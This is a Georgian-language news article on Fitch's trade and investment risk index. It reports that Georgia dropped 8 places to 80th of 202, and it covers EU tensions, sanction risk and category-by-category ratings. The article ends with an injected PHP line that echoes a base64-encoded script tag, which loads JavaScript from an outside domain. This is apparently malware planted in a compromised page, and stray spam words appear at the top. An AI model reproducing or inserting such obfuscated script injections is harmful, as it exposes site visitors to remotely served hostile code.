gorgia
jaluzi

საქართველო სავაჭრო და საინვესტიციო რისკის ინდექსში 8 პოზიციით ჩამოქვეითდა. ამის შესახებ Fitch-ის ანგარიშშია აღნიშნული.

საერთაშორისო სარეიტინგო სააგენტოს ანგარიშში წერია, რომ საქართველო მსოფლიო მასშტაბით 202 ბაზრიდან მე-80-ე ადგილზეა სავაჭრო და საინვესტიციო რისკების მიხედვით.

Fitch მიუთითებს, რომ ინვესტიციებზე, ვაჭრობასა და ფინანსურ დახმარებაზე უარყოფითად აისახება საქართველო-ევროკავშირს შორის დაძაბულობა, რომელიც ბრიუსელის მიერ 2024 წლის არჩევნების ლეგიტიმურობის არ აღიარებას მოჰყვა. „ქართული ოცნება“ ასევე იღებს საკამათო კანონმდებლობას, რამაც შეიძლება ხელი შეუშალოს დემოკრატიულ ღირებულებებს და პოტენციურად, შექმნას ევროკავშირის მხრიდან სანქციების რისკი. ანგარიშის თანახმად, მსხვილ ევროპულ პირდაპირ უცხოურ ინვესტიციებს შესაძლოა ხელი შეუშალოს ევროინტეგრაციის პროცესის პარალიზებამ, მნიშვნელოვანი მარეგულირებელი და ეკონომიკური გაურკვევლობის ფონზე, სანქციების რისკის პირობებში.

Fitch განიხილავს რისკის სხვადასხვა კატეგორიებს:

ეკონომიკური ღიაობა (ზომიერიდან მაღალ რისკამდე): Fitch აღნიშნავს, რომ შეამცირა 2025 ფინანსური წლის მოკლევადიანი პერსპექტივა, გაზრდილი პოლიტიკური არასტაბილურობისა და ევროკავშირთან გაუარესებული ურთიერთობების გათვალისწინებით. ამ კომპონენტში წლიურად საქართველოს პოზიცია 22 ადგილით გაუარესდა.

"არსებობს შესაძლებლობა, რომ ევროკავშირმა სანქციები დააწესოს დემოკრატიული ღირებულებების შელახვასთან დაკავშირებული შეშფოთების გამო. უცხოელი ინვესტორები, განსაკუთრებით ევროკავშირისა და სხვა დასავლური ბაზრებიდან, სავარაუდოდ, საქართველოს მიმართ სიფრთხილეს გამოიჩენენ, განსაკუთრებით მაშინ, როდესაც ბრიუსელსა და თბილისს შორის დაძაბულობა კვლავ მკვეთრი რჩება. ევროინტეგრაციის და გაწევრიანების მოლაპარაკებების განახლება, სავარაუდოდ, 2028-2029 წლებში არ მოხდება, რაც ბიზნესსა და ინვესტიციებს ხელს შეუშლის",- წერია ანგარიშში.

მთავრობის ჩარევა (დაბლიდან ზომიერამდე რისკი): ქვეყნის პოზიცია წლიურად 4 ადგილითაა გაუარესებული. Fitch აღნიშნავს, რომ ბოლო თვეების განმავლობაში პოლიტიკური არასტაბილურობის დონე გაიზარდა, რადგან ევროკავშირი უარს ამბობს „ქართული ოცნების“ მთავრობის ლეგიტიმურობის აღიარებაზე. სანქციების ალბათობამ შეიძლება ხელი შეუშალოს ვაჭრობას, ინვესტიციებსა და ფინანსურ დახმარებას, რამაც შეიძლება გაზარდოს სესხის აღების ხარჯები და შეასუსტოს ინვესტორების განწყობა. მოკლევადიან პერსპექტივაში, ვხედავთ, რომ ახალი პირდაპირი უცხოური ინვესტიციების დონე ძალიან დაბალი დარჩება, კაპიტალის გადინების რისკი კი გაიზრდება.

იურიდიული (დაბლიდან ზომიერამდე რისკი): ქვეყნის პოზიცია წლიურად 5 ადგილით გაუმჯობესდა. 2024 წლის დეკემბრის საპრეზიდენტო არჩევნებმა მნიშვნელოვნად შეცვალა სამართლებრივი და მარეგულირებელი ლანდშაფტი. დასავლეთთან, განსაკუთრებით ევროკავშირთან, ურთიერთობებიც კიდევ უფრო დაიძაბა. ბრიუსელმა უარი თქვა ახალი ხელმძღვანელობის ლეგიტიმურობის აღიარებაზე და სხვადასხვა სანქციების პაკეტს განიხილავს. ეს ჩრდილს მიაყენებს სამართლებრივ ჩარჩოს და პოტენციურად შეაფერხებს ევროკავშირში ინტეგრაციის მისწრაფებებს.

124
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");